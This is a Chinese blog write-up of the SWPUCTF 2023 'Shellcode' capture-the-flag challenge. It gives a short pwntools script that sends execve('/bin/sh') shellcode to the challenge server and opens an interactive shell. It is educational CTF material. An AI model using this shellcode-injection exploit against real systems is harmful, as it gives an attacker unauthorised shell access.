すのはら荘春原庄的雪

[SWPUCTF 2023 秋季新生赛]Shellcode WriteUp

Toretto·2024-10-14 20:54·59 次阅读

[SWPUCTF 2023 秋季新生赛]Shellcode WriteUp

题目地址:https://www.nssctf.cn/problem/4546

主要思路:#

利用Pwntools发送字节码调用执行execve("/bin/sh", NULL, NULL)实现

要点:#

一定要添加context.binary = './shellcode'
解释:pwntools的一个设置,用来指定目标二进制文件,以便于获取它的相关信息,如系统架构,操作系统类型等细节

exp:#

点击查看代码 
Copy
from pwn import *

io = remote ('node4.anna.nssctf.cn',28697)
context.binary = './shellcode'

payload = (asm(shellcraft.sh()))
io.sendline(payload)
io.interactive()
posted @   vstral  阅读(59)  评论(0编辑  收藏  举报
相关博文:
· 极客大挑战2023-pwn-nc_pwntools WriteUp
· 【PWN】初识Orw
· pwnable_asm(手写shellcode)
· buuctf ciscn_2019_n_5 pwn ret2shellcode
· WP 0x02
阅读排行:
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
· 【自荐】一款简洁、开源的在线白板工具 Drawnix
点击右上角即可分享
微信分享提示
目录